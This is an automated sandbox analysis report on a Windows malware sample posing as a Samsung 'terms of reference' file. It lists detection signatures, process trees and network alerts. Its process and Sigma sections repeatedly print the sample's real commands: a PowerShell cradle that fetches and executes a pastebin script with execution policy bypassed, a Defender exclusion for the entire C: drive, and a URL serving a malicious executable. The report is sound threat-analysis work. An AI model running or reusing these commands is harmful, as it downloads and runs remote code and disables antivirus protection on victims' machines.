Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Terms_of_reference_06_01_2025_samsung.scr.exe

Overview

General Information

Sample name:Terms_of_reference_06_01_2025_samsung.scr.exe
Analysis ID:1617329
MD5:c364bcdca858dbb480e269b7c0c0dedc
SHA1:2251325091ef30f44e9bc716d995749a803f249e
SHA256:0e6e34d9db771d5f81f2329150f9b71498feeca06dd764c59a0a4b43b16eed18
Tags:exeWHKzW2nruser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Terms_of_reference_06_01_2025_samsung.scr.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe" MD5: C364BCDCA858DBB480E269B7C0C0DEDC)
    • powershell.exe (PID: 4084 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3276 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 7336 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7408 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7492 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 3276, ProcessName: powershell.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4084, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 3276, ProcessName: powershell.exe
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", ProcessId: 7336, ProcessName: csc.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 3276, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4084, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 3276, ProcessName: powershell.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3276, TargetFilename: C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4084, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", ProcessId: 7336, ProcessName: csc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T18:57:28.713715+010028033053Unknown Traffic192.168.2.549714172.67.74.15280TCP
2025-02-17T18:57:29.182389+010028033053Unknown Traffic192.168.2.549720208.95.112.180TCP
2025-02-17T18:57:32.313996+010028033053Unknown Traffic192.168.2.549726149.154.167.220443TCP
2025-02-17T18:57:54.801700+010028033053Unknown Traffic192.168.2.56079189.23.97.21480TCP
2025-02-17T18:57:54.802006+010028033053Unknown Traffic192.168.2.56079289.23.97.21480TCP
2025-02-17T18:58:16.186836+010028033053Unknown Traffic192.168.2.55967289.23.97.21480TCP
2025-02-17T18:58:16.191757+010028033053Unknown Traffic192.168.2.55967189.23.97.21480TCP
2025-02-17T18:58:37.606294+010028033053Unknown Traffic192.168.2.55978789.23.97.21480TCP
2025-02-17T18:58:37.609819+010028033053Unknown Traffic192.168.2.55978689.23.97.21480TCP
2025-02-17T18:58:59.015165+010028033053Unknown Traffic192.168.2.55978889.23.97.21480TCP
2025-02-17T18:58:59.030826+010028033053Unknown Traffic192.168.2.55978989.23.97.21480TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T18:57:32.313996+010018100071Potentially Bad Traffic192.168.2.549726149.154.167.220443TCP
2025-02-17T18:58:59.697743+010018100071Potentially Bad Traffic192.168.2.559791149.154.167.220443TCP
2025-02-17T18:58:59.702364+010018100071Potentially Bad Traffic192.168.2.559790149.154.167.220443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T18:57:13.834460+010018100002Potentially Bad Traffic192.168.2.549704172.67.19.24443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://89.23.97.214/TeamBuild/win32_svchost.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Terms_of_reference_06_01_2025_samsung.scr.exeReversingLabs: Detection: 59%
Source: Terms_of_reference_06_01_2025_samsung.scr.exeVirustotal: Detection: 55%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256I source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188522957.00007FF6A81B8000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.pdbhP source: powershell.exe, 00000004.00000002.2110018131.000001F7016FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmp
